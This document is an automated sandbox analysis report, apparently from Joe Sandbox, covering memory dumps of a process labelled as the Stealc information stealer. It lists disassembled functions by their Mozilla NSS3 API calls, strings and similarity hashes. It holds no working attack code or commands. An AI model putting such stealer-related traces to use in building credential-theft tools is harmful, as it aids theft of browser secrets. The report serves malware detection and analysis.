Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C9A7EAF
PR_ImportFile.NSS3(?), ref: 6C9A7ECF
PR_GetCurrentThread.NSS3 ref: 6C9A7ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C9A7F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C9A7F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C9A7F15

Strings

NSPR_INHERIT_FDS, xrefs: 6C9A7E41
%d:0x%lx, xrefs: 6C9A7EA9

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: c1a7d2ece403fd7a546189cd2686569a77bc336ce59604caa588a30b3c3fb95a
Instruction ID: 5e09da9a511854c62452e69e4916eec67cb6d07af1a39428e2f0cc39e4dde42b
Opcode Fuzzy Hash: c1a7d2ece403fd7a546189cd2686569a77bc336ce59604caa588a30b3c3fb95a
Instruction Fuzzy Hash: 48312371E041159BEB009BE9C842ABFB7A8EF59348F200925D80597A26E771DD16C792

Function 6C8DECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C8DDE64), ref: 6C8DED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8DED22

Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095

PL_FreeArenaPool.NSS3(?), ref: 6C8DED4A
PL_FinishArenaPool.NSS3(?), ref: 6C8DED6B
PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C8DED38

Part of subcall function 6C814C70: TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
Part of subcall function 6C814C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
Part of subcall function 6C814C70: PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C8DED52
PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C8DED83
PL_FreeArenaPool.NSS3(?), ref: 6C8DED95
PL_FinishArenaPool.NSS3(?), ref: 6C8DED9D

Part of subcall function 6C8F64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C8F127C,00000000,00000000,00000000), ref: 6C8F650E

Strings

security, xrefs: 6C8DED06

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 22cfed9e503039c991b23cede304caf48a4eaec900332d3528491c5bb0d5af75
Instruction ID: c345589c59aafb9f248c2c2f813f591cd0a8e1e7e280c61a91e752dc05534414
Opcode Fuzzy Hash: 22cfed9e503039c991b23cede304caf48a4eaec900332d3528491c5bb0d5af75
Instruction Fuzzy Hash: FD113B759002046BD7306B2DAE40BBBB2746F5264DF060D34E865A2E80EB31F50987D7

Function 6C9A0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C882357), ref: 6C9A0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C882357), ref: 6C9A0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9A0EE6

Part of subcall function 6C9A09D0: PR_Now.NSS3 ref: 6C9A0A22
Part of subcall function 6C9A09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C9A0A35
Part of subcall function 6C9A09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C9A0A66
Part of subcall function 6C9A09D0: PR_GetCurrentThread.NSS3 ref: 6C9A0A70
Part of subcall function 6C9A09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C9A0A9D
Part of subcall function 6C9A09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C9A0AC8
Part of subcall function 6C9A09D0: PR_vsmprintf.NSS3(?,?), ref: 6C9A0AE8
Part of subcall function 6C9A09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9A0B19
Part of subcall function 6C9A09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9A0B48
Part of subcall function 6C9A09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9A0C76
Part of subcall function 6C9A09D0: PR_LogFlush.NSS3 ref: 6C9A0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9A0EFA

Part of subcall function 6C88AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C88AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C9A0ED9, 6C9A0EE5, 6C9A0F06, 6C9A0F0B
Aborting, xrefs: 6C9A0EB3

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: e9521ae28943a9e9d25e1a3dd6b0cfab6949294d63dc80806c5fff66dd547708
Instruction ID: a368ec48a3ded181abf23940d1b7b242c3f02781748a3e93299439f5672c9d69
Opcode Fuzzy Hash: e9521ae28943a9e9d25e1a3dd6b0cfab6949294d63dc80806c5fff66dd547708
Instruction Fuzzy Hash: C7F0C2B69002147BDF013BA0DC4AC9B3E3DDF9A378F044424FD0956602DA76E96496B3

Function 6C904DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C904DCB

Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C904DE1

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C904DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C904E59

Part of subcall function 6C8EFAB0: free.MOZGLUE(?,-00000001,?,?,6C88F673,00000000,00000000), ref: 6C8EFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9C300C,00000000), ref: 6C904EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C904EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C904F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C90521A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 7b2e74e7522a6c7e7cb0f0f16d0e42c7f1f78878c2985953907b3f7634187de8
Instruction ID: e9e4785637d4949f9c7c9960f0708c1be9e89124d645b23c48d5527138a1e9c9
Opcode Fuzzy Hash: 7b2e74e7522a6c7e7cb0f0f16d0e42c7f1f78878c2985953907b3f7634187de8
Instruction Fuzzy Hash: 7BF17A71F00209CBDB04CF58D8406AEB7B6BF49358F25816DE915AB781EB75E982CF90

Function 6C900C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C902C2A), ref: 6C900C81

Part of subcall function 6C8EBE30: SECOID_FindOID_Util.NSS3(6C8A311B,00000000,?,6C8A311B,?), ref: 6C8EBE44

Part of subcall function 6C8D8500: SECOID_GetAlgorithmTag_Util.NSS3(6C8D95DC,00000000,00000000,00000000,?,6C8D95DC,00000000,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8D8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C900CC4

Part of subcall function 6C8EFAB0: free.MOZGLUE(?,-00000001,?,?,6C88F673,00000000,00000000), ref: 6C8EFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C900CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C900D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C900D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C900D7D
free.MOZGLUE(00000000), ref: 6C900DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C900DC1
free.MOZGLUE(00000000), ref: 6C900DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C900E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C900E0F

Part of subcall function 6C8D95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8D95E0
Part of subcall function 6C8D95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8D95F5
Part of subcall function 6C8D95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C8D9609
Part of subcall function 6C8D95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8D961D
Part of subcall function 6C8D95C0: PK11_GetInternalSlot.NSS3 ref: 6C8D970B
Part of subcall function 6C8D95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8D9756
Part of subcall function 6C8D95C0: PK11_GetIVLength.NSS3(?), ref: 6C8D9767
Part of subcall function 6C8D95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C8D977E
Part of subcall function 6C8D95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8D978E

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: e37cdabb1b7c4d8dfe26535f741bda35fa794a6ad1e86b39ded43d5787fec2e6
Instruction ID: 860c029ff3d97925d80df9943548e5699d655f66f1226b1e4ed5ea109cdf911e
Opcode Fuzzy Hash: e37cdabb1b7c4d8dfe26535f741bda35fa794a6ad1e86b39ded43d5787fec2e6
Instruction Fuzzy Hash: 2841E5B1A00256ABEB109F64DD41BAF7678AF0430CF140538E9196B742E731EA14CBF2

Function 6C8AFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C8AFCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C8AFCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C8AFCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8AFD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C8AFD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C8AFD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C8AFD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8AFD84

Strings

:, xrefs: 6C8AFD78

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 184d38e1efc7c2b88e9e946cc33eade1f667802598009f9cb9afe4fbe065361d
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: D53124B2D002195BEB218BE4DE00BAF77A8AF60709F150834DC14A7B00E371E91AC7D2

Function 6C896DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C897D8F,6C897D8F,?,?), ref: 6C896DC8

Part of subcall function 6C8EFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C8EFE08
Part of subcall function 6C8EFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C8EFE1D
Part of subcall function 6C8EFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C8EFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C897D8F,?,?), ref: 6C896DD5

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9B8FA0,00000000,?,?,?,?,6C897D8F,?,?), ref: 6C896DF7

Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C896E35

Part of subcall function 6C8EFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C8EFE29
Part of subcall function 6C8EFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C8EFE3D
Part of subcall function 6C8EFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C8EFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C896E4C

Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9B8FE0,00000000), ref: 6C896E82

Part of subcall function 6C896AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C89B21D,00000000,00000000,6C89B219,?,6C896BFB,00000000,?,00000000,00000000,?,?,?,6C89B21D), ref: 6C896B01
Part of subcall function 6C896AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C896B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C896F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C896F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9B8FE0,00000000), ref: 6C896F6B
PR_SetError.NSS3(FFFFE005,00000000,6C897D8F,?,?), ref: 6C896FE1

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 979a64ca3d6bb6b4285ff00bc1c3ab3a5a6ca43255169c49c5f5b8da985fd0ac
Instruction ID: b1a8d174e0147f191694a708125a529cdfa6497269bb360723a5ab0eee9409a0
Opcode Fuzzy Hash: 979a64ca3d6bb6b4285ff00bc1c3ab3a5a6ca43255169c49c5f5b8da985fd0ac
Instruction Fuzzy Hash: C171A071E102469BDB10CF19CE40BAABBA4BF95348F154629E809D7B11F730EA94CBD0

Function 6C8DADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE10
EnterCriticalSection.KERNEL32(?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C8BD079,00000000,00000001), ref: 6C8DAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE7F
TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEF1
free.MOZGLUE(6C8BCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?), ref: 6C8DAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAF30

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 2ac16e81d8f551dd64312da654870f649023077556a5195748e55ec772e3cb5c
Instruction ID: ae9be3e35dfe57ba3e3f6a3f1aff5cc62991871c9d35400e3d639693427bba33
Opcode Fuzzy Hash: 2ac16e81d8f551dd64312da654870f649023077556a5195748e55ec772e3cb5c
Instruction Fuzzy Hash: 9151C1B1A04602AFDB10DF29D984B99B7B4FF08318F254A64D81897F11E731F864CBD1

Function 6C8B4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C8BAB7F,?,00000000,?), ref: 6C8B4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C8BAB7F,?,00000000,?), ref: 6C8B4CC8
TlsGetValue.KERNEL32(?,6C8BAB7F,?,00000000,?), ref: 6C8B4CE0
EnterCriticalSection.KERNEL32(?,?,6C8BAB7F,?,00000000,?), ref: 6C8B4CF4
PL_HashTableLookup.NSS3(?,?,?,6C8BAB7F,?,00000000,?), ref: 6C8B4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C8B4D10

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C8B4D26

Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C8B4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C8B4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C8B4E02

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: fbbaa879f08b81e99fa233c90651d5e815b9b268cae4a98936b76e6c2e6becdd
Instruction ID: 9ef90a66e7f1cbcadf0dd6f66f783249d8a490a68ce5def4d6b05a8219d7d581
Opcode Fuzzy Hash: fbbaa879f08b81e99fa233c90651d5e815b9b268cae4a98936b76e6c2e6becdd
